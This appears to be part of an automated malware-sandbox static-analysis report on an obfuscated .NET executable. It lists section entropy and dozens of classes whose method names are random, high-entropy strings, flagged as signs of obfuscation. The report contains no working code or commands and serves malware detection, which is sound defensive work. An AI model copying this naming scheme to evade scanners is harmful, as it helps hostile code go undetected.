Source: sihost.exe.0.dr	Static PE information: section name: .text entropy: 7.577310772845179
Source: dEhCbXEAIUCUplvbdoWVtmGx.exe0.0.dr	Static PE information: section name: .text entropy: 7.577310772845179

Source: fdsN8iw6WG.exe, egX5ApVIBfx5UWJMXqi.cs	High entropy of concatenated method names: 'oUXVmOUmnM', 'mgr5i3qWy1R3qatjsKv4', 'JbQAR9qW5xxoBhjQlTiP', 'zTY0jNqWfHNYCuevDdIY', 'b5XbC8qWUxehZOCmgjT6', 'doVYEIqWaNCy9Gnd9GZR', 'bwWAgbqWs5AkPImKdNuO', 'knT2J0qW3HTUG4cx3kvp'
Source: fdsN8iw6WG.exe, w0uddHJx9cl1soAVmOK.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'Lm0qVJJjGI9', 'D3IqJqwFuBs', 'Ebq2w8qi2BV5HRSjHI0x', 'OdmoelqiFZH09AiifP6N', 'SEOreCqi9MBMd8CNThOA', 'ccHa3uqia9O7fMaH4NFb', 'FmgWVNqisvSpXFlUcvSD'
Source: fdsN8iw6WG.exe, R114gd4rSRRNN94ucam.cs	High entropy of concatenated method names: 'nSf4FJWVYO', 'uwj49bYUPa', 'zB94anIqR1', 'JkhlSGqZIttJ5FfsRi2x', 'e96bPDqZGOwfSO4UTWL5', 'yows4UqZhlQPHuDMy6ty', 'Ne742xqZ0x01vCSe6gBT', 'AG34Z7Hnqy', 'tRE4PuVJEm', 'mnm4uovyKR'
Source: fdsN8iw6WG.exe, Yxmw2BmjpcRLTKofIA8.cs	High entropy of concatenated method names: 'vmrmblalmj', 'H5wmvaK5wi', 'yPAmckmRob', 'ScGmd8LWZs', 'wxgmNJyhsH', 'pjKm7Ywh0t', 'KYBmEt6lvS', 'T1smThZXkn', 'd7bmto6kkM', 'KBPm4QMBws'
Source: fdsN8iw6WG.exe, fPKCoIVjAgBMeSAiPlK.cs	High entropy of concatenated method names: 'MMnVvQHNfi', 'QcSVcaZX7Q', 'sCLVdL5qPf', 'YlsVngqWiTCcbm36PTu2', 'bVwTEFqWbhOLM0cpA61j', 'REB5x7qWS9C1xvWQegSy', 'RkniB4qW1vuCRPJWfsUr', 'yqoV2CqWxPAqSMXJi7r8', 'xlooQjqWg0836IByqCUC', 'DAonHMqWWG6iMWu1xPFC'
Source: fdsN8iw6WG.exe, yKPrjgzbKofUIO04IT.cs	High entropy of concatenated method names: 'R1lqqm3GWc', 'LVBqBQHStE', 'BdeqJYF3ZD', 'DK3qYh5ZxU', 'qJUqeq8drc', 'noKqleHc2l', 'MQCqARrVTY', 'IhaFYjqKVLpnOn0CcSkW', 'Jum37ZqKAEmLZ5UCSuwM', 'PYpLRrqKjM3x9xXE0SSn'
Source: fdsN8iw6WG.exe, XwDHFyVKDEOV7pjHm1V.cs	High entropy of concatenated method names: 'ewfV1OK9OW', 'o5GVijrgS2', 'lJtVbCO07G', 'psPVxrhRnS', 'QcZVgoPXa4', 'uEIVW1tq5D', 'oQts82q8kIIHSKJ1wdgS', 'y6A8hiq8q53kBrjaq4LM', 'DhOT7Aq86FbehTRMsLH5', 'DZOAKgq8BnZIAJvTUrgH'
Source: fdsN8iw6WG.exe, ajuGBUWLbGMb9vprVOW.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'HqsWpvNP2o', 'jGsWZpOgSQ', 'nnEWPa7tdM', 'oAFWuHMV7y', 'nstWnuKbCI', 'OwDW2UquX1', 'ANEI9wqfBMBRrZKr0eVb'
Source: fdsN8iw6WG.exe, zs1hb3pb0QsRt4USbZJ.cs	High entropy of concatenated method names: 'Y7opgHIWsk', 'SvypWuGZnj', 'trup8F6BLc', 'S2qpHQpEG7', 'UPopLgIBu9', 'SCSprJlLhS', 'OlxppVrZjD', 'QwipZsKdYQ', 'kf1pPHwecc', 'Hlepuwr3if'
Source: fdsN8iw6WG.exe, xBcFVU6YgQQxyR3l0Qv.cs	High entropy of concatenated method names: 'P1P6lEld0X', 'tSC6VyN2re', 'Q4W6AnErDM', 'FT66jtqY1h', 'Rgt4lLqS7xsA6LDX1pZa', 'sjqWryqSd3j0iMVu5EHO', 'njESbYqSNPShZqb1ioX6', 'cucWmSqSE9WBgtOZDM3y', 'AQCx1XqST476J0j03eVh', 'aNimogqStDisoJNSoO7Q'
Source: fdsN8iw6WG.exe, Qn50it1cQgGZfZ6IHeb.cs	High entropy of concatenated method names: 'wIc1N1P9lV', 'SRF6AYqamxIBpoyp17Sr', 'tmwuckqaIPjWUP3bM9LT', 'OirBGgqa09PTaMK8eiXo', 'QI1htjqaXEIO2jHOWD4W', 'CaSGFZqaRHBvImttlHCW'
Source: fdsN8iw6WG.exe, ftSwvJqU4pQAM8nGXxD.cs	High entropy of concatenated method names: 'P9X', 'QGlqDqJquX', 'cyKqVkRMl4P', 'imethod_0', 'ibSqQwB91E', 'Amn2A5qKwbASbtSXcmGt', 'zVHKHQqKosXWWMxgP9s3', 'bpNTMsqKDxhxSJAF94aj', 'zpiXoXqKQmFsCVBbn1op', 'uBXFc7qKCPl9DUbff1HT'
Source: fdsN8iw6WG.exe, tWwgM7lb2rSWWKiCcFr.cs	High entropy of concatenated method names: 'gHklgfXKRl', 'VfnlWiNrdH', 'p5860wqgCpR0EDhvZ19v', 'PGYDf9qgwNEk12T1AXKM', 'S9glDqqgoCgvL27rLHKa', 'JleMb7qgzbkByMGU3uwx', 'jKxS6gqWkn8Zr8RNiss2', 'KAmLtkqWqREEFr4n4m18', 'LTylHNqW67AxC8swDsQ7', 'AnH5QIqWBEiO7Nd4nGtA'
Source: fdsN8iw6WG.exe, LeUyFJULsEHZDVdV05B.cs	High entropy of concatenated method names: 'O0aqVMFWPbF', 'nHoqeRg5EuQ', 'LPe6FPqQRmRA2ng8FCI2', 'RN93tsqQmfZoF1qKn3qW', 'WJD8b9qQXUoJQjgprXRi', 'vXc9B7qQ1DJps4C1ZXE8', 'fbRdksqQKGxs01RTBdLL', 'Gx78QmqQSvIXNxyExg6o', 'imethod_0', 'nHoqeRg5EuQ'
Source: fdsN8iw6WG.exe, xapvcZMbbPPFE3HcGi9.cs	High entropy of concatenated method names: 'method_0', 'Lq1MgeTUSk', 'skgMWTGd0L', 'a4RM8BnS6J', 'lcoMHDP94P', 'YcpMLyQePk', 'MeuMr1Tnvi', 'ITPUBnqFxE1tS7KX8Vt7', 'E9xLCtqFiIPcXO0MqXNg', 'QUAjUdqFbc95Dbqs2uBG'
Source: fdsN8iw6WG.exe, pdbekNQTGLIDcuiPehd.cs	High entropy of concatenated method names: 'EWQ3YDqoIjtaSSfYp170', 'aaC6piqo0LDkCa9fA4T9', 'c9SwUgT8eW', 'zJTGK6qoMnTh6ibyOKuQ', 'VBpmQPqoKfkcWZG2NxKD', 'QGHBooqoSLnPu5umvZEh', 'Py4ekTqo1EpYLMQ0KO2x', 'yveesBqoibBM7jBkNSOy', 'MmcKSOqob04F7IStp0oC', 'Mj5WqvqoxeXKy5y93d8U'
Source: fdsN8iw6WG.exe, Su9CoKYAk3SFlVF3hsK.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'IW6qVYBirba', 'D3IqJqwFuBs', 'W5rHW4qbm4fKdc0NqKSE', 'bErUM1qbXEMTEpq7yhPp', 'JNEWpbqbR7oMqHiQtg5W', 'Ri0T1rqbM4Hfdxsock9O'
Source: fdsN8iw6WG.exe, zKNSU5Yn3jp40c4lqs4.cs	High entropy of concatenated method names: 'wMDYsMJP67', 'nWKkPtqxVjSwShZooGa3', 'qTlurMqxAXbJVnN0ocpE', 'RDeOpkqxjJyopq3k4Lgf', 'u19l1hqxO2tO81dEAhAx', 'U1J', 'P9X', 'TswqJ7XJc4g', 'Ut8qJEHvR5N', 'OGTqVlHEVOC'
Source: fdsN8iw6WG.exe, yREZOVeXShGLXxndis6.cs	High entropy of concatenated method names: 'xg6ebeVNJX', 'wohmRRqxF9eHFB2w4KQ1', 'x3mKrwqxnoZGeHogFUPp', 'x9BWpxqx2NGhyKV5QFVA', 'wSQt7qqx9yA1kFV9Qnwi', 'hNsoyYqxatJ2QB9AmL4g', 'E94', 'P9X', 'vmethod_0', 'RqMqJGt1e1T'
Source: fdsN8iw6WG.exe, KPUM3bByKI9LeOyXEIA.cs	High entropy of concatenated method names: 'yI5JBlIlF4', 'qCwJJQK2Su', 'mknJYpsYFP', 'O6OQWSqivDDhTDfyMfU6', 'bCZ0Bjqicavlq6LtdIYD', 'SKRn9lqijIQJWJELwJps', 'smjds3qiORf5x61JtUkf', 'YnyJOoulJU', 'hPm1jcqiE84RgbqrEsSu', 's5BO6yqiN2yiNIgZgAeZ'
Source: fdsN8iw6WG.exe, p69Knhm5mc5omdjKrGl.cs	High entropy of concatenated method names: 'd6EmUi4qKU', 'Udhm3iDhYL', 'y5cmDACuYJ', 'TRbmQaDTYX', 'UwAmwq1lCo', 'l61Oamq2qa3ftjhBuvwy', 'oNX1wBqnzqTA7FBTmSew', 'f7r1lnq2kTr8pwRSwdKa', 'HH1ppkq26d3blXBwJijY', 'EyJbsbq2B5Mgo6hYPRnF'
Source: fdsN8iw6WG.exe, b5rKDvKBcPG1SUuPIfs.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'EpgKYRYd8M', 'Write', 'YiSKeW5Ba2', 'oBjKlWJGJr', 'Flush', 'vl7'
Source: fdsN8iw6WG.exe, NGp7CHiCUmhWkFuSGu9.cs	High entropy of concatenated method names: 'LZRbkX0Z0a', 'onZbqpk4xD', 'Yd7', 'iGqb68cNY6', 'sIebBjeK5Y', 'PnqbJdZy9P', 'Nq1bYxTg7f', 'ty1lJAqyVUoFvioPJPCC', 'nybVTMqyewsWaNL9xTTh', 'SMaOZvqylO15X3d82aNM'
Source: fdsN8iw6WG.exe, pMcHW4VFos8OIKsnkp8.cs	High entropy of concatenated method names: 'bltVDskmtj', 'F0C4lvq84B0UBDmGnFUi', 'zlqaqAq8TpfyRUktOEFD', 'zUlPlfq8t3kQlHd3ZIgD', 'AivMTWq8GO53YBnjcHJJ', 'QgLT3Lq8hvrmFaB5sqx6', 'P9X', 'vmethod_0', 'UpuqJKUMeLJ', 'imethod_0'
Source: fdsN8iw6WG.exe, aGkRaEhObI8YSuaZ1Uy.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'm8AqVI7cUwW', 'uXFqV06ELRr', 'ySHktnquBREZsBlGslT9', 'Se2CSvquJClUibV9lU4r', 'veGekVquYWSNWERJW9VQ', 'SVC3M2quecCQZpWhi8Ve', 'HdlHC8qulrTuD7GKJLH1', 'dPNy9BquV3E9u7N9svO4'
Source: fdsN8iw6WG.exe, CEllyTlqIpkwcmEmerr.cs	High entropy of concatenated method names: 'daxlB6Ykyy', 'IZqlJ2s00t', 'bEClYm2mBn', 'oJmb9xqgdUnNEPMAtu9e', 'DyYUS8qgvrvpv3mhdFS7', 'r6cQ9Nqgc2JIXm3c0A9C', 'QFZIsWqgNiovWh6gF8H9', 'NU6rPBqg7qFBaYViNbKf', 'DwPXyYqgE711964oh513', 'saZmCNqgTe2wyPMIABF9'
Source: fdsN8iw6WG.exe, gYvYpOBMtoUZnv1njqV.cs	High entropy of concatenated method names: 'uVXBugjmBG', 'p1IBnb8023', 'iZSB2Uu17f', 'BFD0OBq1shGq1DaiV7a6', 'aUom0uq1yWMPF6SLA6qA', 'ldQA12q19Ltk1yjujtNs', 'HWx5BRq1aF06DRy9PZCK', 'p4NBSQxOvC', 'xTwB18uylU', 'VHOBis6fcY'
Source: fdsN8iw6WG.exe, AdvlVFqCJu4c93ZLLsN.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'PcqqVqNNen0', 'D3IqJqwFuBs', 'A8Y8k9qS6HNAS75T2QsD', 'W1ofpjqSBFkIIEOsnnJc', 'bi3beTqSJ93cQvON5NUg', 'Pw7L3HqSYyrC4DOxgipZ'
Source: fdsN8iw6WG.exe, PQYAe6GnQmZBthpHNFd.cs	High entropy of concatenated method names: 'h06GF5fI7j', 'mfaG9nYlRA', 'UErGa7luRj', 'GHK4oMqPiCZLcdlNm0yS', 'sdNqU8qPSD95sRBjmjR5', 'zSWpyGqP1Pu1QVTyjE25', 'WPDNhJqPb6rpf6kUZDXH', 'Ld7jCuqPxB7ItWrntHbP'
Source: fdsN8iw6WG.exe, WdjV4rSfUP9434dW8cS.cs	High entropy of concatenated method names: 'zQbS3YlBvJ', 'UZQSDmu3ii', 'KtlSQXZWcF', 'KwgSwlhZBF', 'WknSohjrRD', 'HmPKZCqaqVGpuFJ22iRV', 'EnKqMtq9zLkKXXtnLcUa', 'BW1cEmqakMUXupqLdh8q', 'LRB0dSqa6Y9agKkMd2fO', 'MjEXGSqaBq4wP7iyQEW7'
Source: fdsN8iw6WG.exe, wmLSJqIctSxP7QTh7Qx.cs	High entropy of concatenated method names: 'h4MmqOujaG', 'sqvx2Bqn8PCboMCeRtkp', 'gmt1puqngq2QwVUFf0Vj', 'wknhLuqnWJWNxNv34uOn', 'fxTtGNqnH5MsTuRrHPIc', 'MCbINoDlum', 'UyxI7x8457', 'CW9IE4APDv', 'EwMITNPhCW', 'D3EItx1sxf'
Source: fdsN8iw6WG.exe, KFKpG1i2gBA0DXwE2E4.cs	High entropy of concatenated method names: 'An2i989aVE', 'UjkiamSSTP', 'InCis9ydYk', 'c4diyYAvia', 'n61i5GPqYq', 'S8c7AYqsQ89FShVokc3U', 'GRLR8wqswh8hlJINxtZJ', 'JN8LA6qsoRG4foCm9k5u', 'iENsLmqs3mBNaY8NOcB9', 'poAn2MqsDyPAxPFR7InW'
Source: fdsN8iw6WG.exe, l6NqAIJpwPIC0o5av82.cs	High entropy of concatenated method names: 'UDYJoYAqIS', 'OwuZVTqbva7liaAIxiWC', 'wQOkXoqbclUVsGEfUwTK', 'bpj16ZqbjbDun0sReM4J', 'wdUomcqbOLXHnc3GEYfY', 'AkSLZLqbEkseshY6hO03', 'T3cmvwqbNEiNHb9oZv3p', 'TayhSgqb7Km4Af7JLoKs', 'z93Ue6qbTSEwhW3cm0Jv', 'WDXYe5GFaq'
Source: fdsN8iw6WG.exe, Qt8NnulAV6eSn3MjF0L.cs	High entropy of concatenated method names: 'anDlOEi4i7', 'zkhlvu4plV', 'OwVO7pqg0iDaEJQ4SAyh', 'FdXEtyqghGIeT7aiSs6E', 'f9KxeXqgIIDsH0xdUX32', 'HYCoDCqgmfgilvwqDXwt', 'E0bMdXqgXUbOD39pOcQM', 'Ee2LVZqgRNT132R160eq', 'cD5lHKqgM5pwUud3JoWx', 'vRHfpHqgKTdC5vnMVy4d'
Source: fdsN8iw6WG.exe, IPIIKiY5AFZIiawGGsC.cs	High entropy of concatenated method names: 'ovCYwTyCgJ', 'avCYo2ie2P', 'VoFYC6AkQu', 'w5YYzsR0Z2', 't7JekVnmLV', 'yHeeqoIDqR', 'fSIe6Zv7g0', 'ETDTB2qxGvPjQarsi7Wr', 'oqX65MqxtCRPZ7eseCvZ', 'qEnZZ3qx4hE2dtaFBBpX'
Source: fdsN8iw6WG.exe, aoCAWjTppbDF8eqIqr.cs	High entropy of concatenated method names: 'hRSWDTRuA', 'kXebRwqMgumbFeMLZ6Bi', 'jbLMIhqMWK7W0vImS2FH', 'THPPW2qMbEKhiH4T35XC', 'qtK6NPqMxHH3BadryC0T', 'iLa4sDYYE', 'dtIGQWi3Y', 'dT9hUBqLM', 'NLjIaumVo', 'C9y07lBYH'
Source: fdsN8iw6WG.exe, rIfUy5XnwG3ptS7CPoa.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'zmfXFRev5e', 'IPBX9kqoEO', 'Dispose', 'D31', 'wNK'
Source: fdsN8iw6WG.exe, EtoUBoAdpbZkDdEsClc.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'SZKML5q8nph1xqEuPqhY', 'aL0kkRq82v4AQLSAGmHo', 'R9Ejehq8F66TAYw1H73J', 'wAoZ06q89tNAd6ZejnMg'
Source: fdsN8iw6WG.exe, hNsBv3GdOk39acxQjTs.cs	High entropy of concatenated method names: 'LxaGGk4QNx', 'dXwhW3qPBMBfhgM7223M', 'trfp9iqPJ015jm1X4qpe', 'bjREbkqPYkc3SnkcOXuP', 'g8dxqcqPeU5H7MSHWbtr', 'ticG7auf2D', 'qp49vHqZo9L3tLyGkZAI', 'kE7aZNqZQBsw3knMnQ1H', 'HcqVMbqZwIO3d2T3j1Us', 'tyjCLGqZCylRcPxcuNKZ'
Source: fdsN8iw6WG.exe, RkTrELh7G1ZrRMjLCEU.cs	High entropy of concatenated method names: 'haiGVLqu1pO7tdFQc4He', 'MWp0Wequi0rhKFSembTs', 'Y0SEa2quKgaVIXXvuSXL', 'lHnbtaquSxiKwjCV1b4l', 'method_0', 'method_1', 'bNvhTSwvPZ', 'w31hto2n8V', 'RoUh4fA7Yt', 'cYshGoFQyf'
Source: fdsN8iw6WG.exe, sVL7kqDbCsL8WC94xl6.cs	High entropy of concatenated method names: 'x3hDgbRNta', 'ii0DWcbdGa', 'okJD8NSJUw', 'ONbDHO0Phn', 'Dispose', 'sSsF2xqwHxvlk5Mthyce', 'UlexTBqwW3RBIaifID8T', 'ExlmJ6qw8B1CaG70AT8F', 'Lj5TSaqwLP3VjdeLwx3e', 'oC9jVrqwr8MrOmHBc3Jr'
Source: fdsN8iw6WG.exe, Xawy4pA6KTD2bja4kY4.cs	High entropy of concatenated method names: 'FsfAJVaVjp', 'tCcAYUdau8', 'NkAAeT5Dwc', 'umVAl1dZ17', 'h5oAV06rXQ', 'mdwAAWdHX6', 'JkYAjGGdn5', 'gvMAOEYKBu', 'KIpAvTl9IR', 'AshAcoFmcX'
Source: fdsN8iw6WG.exe, SrUP9IGs2FBJuI4naQg.cs	High entropy of concatenated method names: 'oVRqVEexoWD', 'I9UG53WrGq', 'RGaqVTUKsZ2', 'zx6OrkqPHMauOnVF81fw', 'tAa8KdqPLDhWvdOnEmlR', 'QU6Ya4qPWrI2XGGXxPqU', 'dAvo1yqP8XUx4lU6Mu7X', 'YbA6dBqPrhwu5cLMCBCP', 'FyvaXSqPp3WsGyuOkNne', 'uUmflHqPZqnA956QkSQL'
Source: fdsN8iw6WG.exe, taNtvf1ZhvtCI7h90eA.cs	High entropy of concatenated method names: 'uR71u0new0', 'Duc1nuJMVv', 'o8H121PHHM', 'ppR1Fq41L8', 'Pr119vgjaP', 'OPu1aFRM3t', 'B4M1skucxR', 'F2G1ycvVFp', 'bLa15OYcgU', 'Fds1fgDUMi'
Source: fdsN8iw6WG.exe, fJ5D4eqdMwsKj2joBu9.cs	High entropy of concatenated method names: 'lMaq7xpTMu', 'HnCqEyXTpG', 'WEuqTUB6KR', 'gVB20GqKt4EnFJiKJJrt', 'liR5RwqKEtpC97PkRFwG', 'eXhfJIqKTnvA0AxoBOra', 'CwICDCqK4s5vcST8iN4y', 'PUX3a8qKGl3lxkGAcUrl', 'j389BhqKh1r84k0HLDIt'
Source: fdsN8iw6WG.exe, YJklBh6yeX00iRUIyC5.cs	High entropy of concatenated method names: 'r2EBlEBpdV', 'j2PSwPq16QqNeN6n7enk', 'oVeYHqq1B6sHTh7GZHkb', 'U1adZcq1JEMgOeWZu514', 'U0cKc8q1YyD61Q17KrEi', 'ASx2Bdq1kG9Hhkiq7Ig8', 'WEZSuUq1qGwCNBAWYcsw', 'FfdqN7q1e1tYdls7lFWJ', 'wbGDGaq1l42i0qJjQvNH', 'AsOBkqDOdQ'
Source: fdsN8iw6WG.exe, W1sryrKPUwbAG7J1qiK.cs	High entropy of concatenated method names: 'UCeKoIrlpa', 'ts9KzRxnSQ', 'iUPKnBAD1c', 'fKHK28tgfR', 'IV7KFlik45', 'WAJK9yn9Zq', 'q2FKaXOE0V', 'nAiKslEZ1J', 'lIJKyFUAPp', 'XQSK59eHn0'
Source: fdsN8iw6WG.exe, jPDEUil4noDrxp0XXBY.cs	High entropy of concatenated method names: 'isBlSvKJTv', 'Ck9yDUqgUBvAQdD4KuJa', 'BVoSgrqg5yJN5ioI1Ktr', 'jmQVWyqgfwYVpUR6fDNH', 'SY3WAAqg3KGCK5h72iEI', 'S5TPPkqgDxwf4eu7qbpj', 'DKNlhSEnaV', 'CgAlIZMZFM', 'fMLl0Zy5EH', 'kSSlmHRfvh'
Source: fdsN8iw6WG.exe, e2vBE0RU15RQBVDEBHq.cs	High entropy of concatenated method names: 'rnvRDI9C1l', 'gJORQR8MtW', 'DemRwETBv1', 'pNTIKYqFdXbXYsggFx2q', 'uipr2VqFNgLGjTp8wx9e', 'KcUgJKqF7Y6K07TO9YCu', 'a8OxqZqFEwIsiZDIW6kn', 'pCPH0aqFTFl8W38AxeNa'
Source: fdsN8iw6WG.exe, J0FM1SRm2Og7nwQGYk1.cs	High entropy of concatenated method names: 'jrVRRjqucM', 'MTDRMEJbeE', 'SE2RK6rB7u', 'dpxRSTD1KZ', 'FYPR1ehT2L', 'H4HHA8qFBTfiTa2DKZIb', 'ghxZXEqFqrl9B5ZWnPY4', 'TfxdvVqF6Edsu9EZHtnr', 'QnFtOkqFJP65l8w0DMgu', 'nypNrwqFYbIKk0oO1Uwr'
Source: fdsN8iw6WG.exe, n1Mf7KlPf92gmJOi6XV.cs	High entropy of concatenated method names: 'xC4lDDDTq4', 'Tt0lQIfg2h', 'VF5SSgqWTSDP7Pr5iiRA', 'VjoBfRqW7otk6uKrPybk', 'IbPybVqWEyTJTDQf6tbs', 'qnEYfvqWt1kcKRwiIpfq', 'RVslnysppI', 'sHpl2GPIGo', 'p34lF8s88r', 'xEXl9hXFy2'
Source: fdsN8iw6WG.exe, ANLCJrYpXR0Z4fjMChG.cs	High entropy of concatenated method names: 'q64', 'P9X', 'qSFqJdpCQpP', 'vmethod_0', 'KMZqVeJRy7W', 'imethod_0', 'IbD1cFqbw1FwRaeB3qhh', 'M7HkuZqbogpIUbpQaM21', 'agNhBiqbCsXPZL5TSwBY', 'DENjOXqbzl27t1dgANVB'
Source: fdsN8iw6WG.exe, dJCpWnH8Ngiom6FjyUx.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'pxjaCgqfF8ZRbYjaeAk6', 'RvhO9hqfnPHqgDWicCII', 'EQUA0iqf2YegFPQR6MQs'
Source: fdsN8iw6WG.exe, cQcTaa4SXg2TOhlf5SJ.cs	High entropy of concatenated method names: 'OcV4HFBepN', 'jL1oTKqZd3ZKXnoH76fC', 'lNAX8OqZvHgBZpxjbgRy', 'KJWYEdqZcUujYJclr8iN', 'qtBnTIqZNomdxf6qJE8d', 'Fw94i9ShC2', 'e8q4bkmtSX', 'Wo84x2dEUw', 'tJbV9cqZAKbaMZOVGw7r', 'B8DaKuqZj1ECugNF5Jo3'
Source: fdsN8iw6WG.exe, IMlpe9bw645ZZqjxGSl.cs	High entropy of concatenated method names: 's0jbC5LTDY', 'RWxbzl396h', 'EQFxk8EKTE', 'A49xql8raf', 'orGx6eVaml', 'znDxBYTSua', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: fdsN8iw6WG.exe, PpiV6vY78kMgnQlldUs.cs	High entropy of concatenated method names: 'TntYKVj3WB', 'Lk4YSItvSh', 'bWWY1cNC8C', 'R8hysPqbFPhFXi77LO0d', 'a7yvLGqb9CCXUEdyYPkU', 'ry39QdqbnvAPUEgwON6G', 'HmKodYqb2EGkmjOggib2', 'asbYmoAnAR', 'PoQYXyNtjO', 'lx1lGNqbPm2spfkNkEy1'
Source: fdsN8iw6WG.exe, YmbdYKrbIPv3moZpjFN.cs	High entropy of concatenated method names: 'tharg34pTJ', 'uDXrW9UXtg', 'KBFr8b73Ob', 'cUKrHvPOVb', 'SUQrLV8Ita', 'i0rrrfpLtD', 'DnTrpCTJXf', 'B9HrZIXLyj', 'VLYrP6HNo1', 'VilruWZZou'
Source: fdsN8iw6WG.exe, uI3eimotW4Oq4gFHK9T.cs	High entropy of concatenated method names: 'J6uo1UPZSv', 'fjtoig98Na', 'k07ob3muTV', 'JyNox0VmDy', 'rupogRZVoh', 'cCLoWdH4dw', 'sXJo8Eohon', 'je5oHXcAva', 'PcVoLEQ9Oq', 'IfQornLHQP'
Source: fdsN8iw6WG.exe, i9QFMySCHBaWdaAEyu0.cs	High entropy of concatenated method names: 'G0C1kXrCW4', 'ulo1qsq45T', 'oxm1672iY6', 'DwV1BTbhbp', 'Moh1J3XKMe', 'PYY1Y0nlFu', 'csY8F9qajrfVGuvlugfG', 'NUagYUqaVWOg8gn7frvp', 'WQtOXOqaAWFV65PxUSOb', 'pkpwW2qaObNWpdcmxL6Y'
Source: fdsN8iw6WG.exe, ri7Zud6NxZbGmksf19T.cs	High entropy of concatenated method names: 'CYd6EFDdQF', 'BE96TmTVpP', 'NKF6t6alEI', 'YwwK00qS08D1Y8osRaHq', 'ySaSXlqSmryyZhKdxHhi', 'jtbU3bqSXwAvNjQggsgC', 'llKxfQqSR7PNdhsmx6w3', 'soOPW5qSMBjpe8WbI9jT'
Source: fdsN8iw6WG.exe, dAP6Xpgy8vIJuOqZDLv.cs	High entropy of concatenated method names: 'BVjgf7b1DH', 'k6r', 'ueK', 'QH3', 'HcKgUkXG1h', 'Flush', 'SJHg3nQO3t', 'A2VgDETh3X', 'Write', 'TvQgQlkm6T'
Source: fdsN8iw6WG.exe, OQoj9IMOkj0KoCpQFhE.cs	High entropy of concatenated method names: 'pKYMct4XRk', 'Fk0MdFXThu', 'iDSMNIcXkA', 'r17M7FTygR', 'hu0MEEfRuQ', 'rhBSyTqFhvHuXfdjcVT5', 'zgiyyqqF4i5w4AiRHG56', 'aeM2QFqFGxfum2b5UULP', 'H2dDwnqFIHYfTD7UPLZl', 'o8Vjf6qF0Ru0Tkv5nI4q'
Source: fdsN8iw6WG.exe, AhbPDNAmRl1lrDcgYfS.cs	High entropy of concatenated method names: 'XiKHyTqLZCVxjDadb3dW', 'WlW1m8qLPYP7QTVXetMy', 'N2cdCWRo2n', 'oE0mbTqLnpoaWh9YPyjn', 'y5QekkqL2aEGmsZgV9Qh', 'o330sKqLFHtp4CyDltbF', 'WMF07UqL9fI1eOM36ln0', 'MBvNqQVufb', 'zagH0xqL5x4EGZs78066', 'xx1mJjqLsZZO63J14Uog'
Source: fdsN8iw6WG.exe, s2qc1ANObZ4TJ24kpbk.cs	High entropy of concatenated method names: 'Dispose', 'oHNNcT9kSY', 'M1JNdi8ifs', 'M0LNN9FTpR', 'emcphwqrqqlVOgH3aYXZ', 'csI9bxqr641Sf4ZwkH1P', 'En63uRqrBRZpF9WYbD3p', 'ANb3hmqrJg7JnVperZXK', 'FvBM14qrYh7KgKT8h0K7', 'yJhiRbqrebJtj8cP7Zlf'
Source: fdsN8iw6WG.exe, v9M7p6QkE5ASyWQkyRU.cs	High entropy of concatenated method names: 'iQoQJnoy69', 'WfxQYm90YS', 'VWkNf7qoqClp7kMkyYfW', 'cSt3f5qo6rFEsSuyj4db', 'fqLELFqoB6DOmtMv909V', 'ouYnlIqoJi23H3Z6yeHm', 'R48m0dqoYl1DYLoh3loe', 'kAsQ6OMa34', 'Ek7rIKqwCiIhVFcq0vAp', 'CEBcgaqwzooqwWyB7UIv'
Source: fdsN8iw6WG.exe, RxucS9N06J3I2Qc2Cc1.cs	High entropy of concatenated method names: 'PMI4chrCqW', 'xGv4dmoqcb', 'CFHVmuqpUWFsvXKe0MlX', 'pJnWloqp5O1jEl3BMoGa', 'EiShSuqpfIO15YG9RKDC', 'iJeKlOqp36fqiT4MQSsF', 'MpbfQhqpDS44SgZR9TEC', 'k0644k8Rvs', 'E2LKT3qpCKZQq2bbid5o', 'hA01tEqpwaA9MHINdvXb'
Source: fdsN8iw6WG.exe, fVe1R1SFtmfJIioVEG3.cs	High entropy of concatenated method names: 'p97Sa8dBSx', 'Q2qSsZL2mF', 'FG5SyOqOJF', 'iOBRqjq9UHW8GJEyhVl8', 'bbGBFHq95KQRiiQc9Jge', 'XPhAPFq9f5wUR06aQjfQ', 'TixgmTq93RoXQIE2FiDS', 'YYEkVoq9DMF7QxWTePV1', 'wcZZ8oq9Q9DF4kTXPlVv', 'FWvdAsq9wPv8YgUIN6G1'
Source: fdsN8iw6WG.exe, NxbNCmopUYyGuEtkruw.cs	High entropy of concatenated method names: 'V7nqexMpOWC', 'LuBqeghPw0H', 'x9RqeWXd54c', 'Hw2qe88CjL3', 'ULbqeHe140A', 'SKLqeLFiENu', 'TWdqerrrr4r', 'a2PCY6AxUQ', 'pQ5qep4Hr5S', 'VoHqeZV5jXj'
Source: fdsN8iw6WG.exe, KefxYfWy2gd6QiWY0RC.cs	High entropy of concatenated method names: 'OwbC8BqfGiE4DkMu8xB8', 'WxlRKDqftw5RFWun4ndh', 'p2htlWqf4LqfHRKIUZMX', 'hguP7gqfhPttfB2dQjad', 'KUaWfPpB4D', 'Mh9', 'method_0', 'jAhWUuACxZ', 'JeuW3ML0Ih', 'e9TWDHa8Ry'
Source: fdsN8iw6WG.exe, va2tx6r2RRYGPfyTd0i.cs	High entropy of concatenated method names: 'QUiqVX12sxI', 'Vsir9Xijrl', 'kG1ralGoKY', 'sHFrsiSeCa', 'ioueQSqUp7sRjMP2ZB4p', 'w5wnAdqUZMuk63fYxweQ', 'cHcGAcqUPLASnSctefUS', 'V02WcHqUuXvm4Uddwy56', 'E2S4swqUnvGWIBx3GMbE', 'zApgmpqU2OTPfW9eCYZ7'
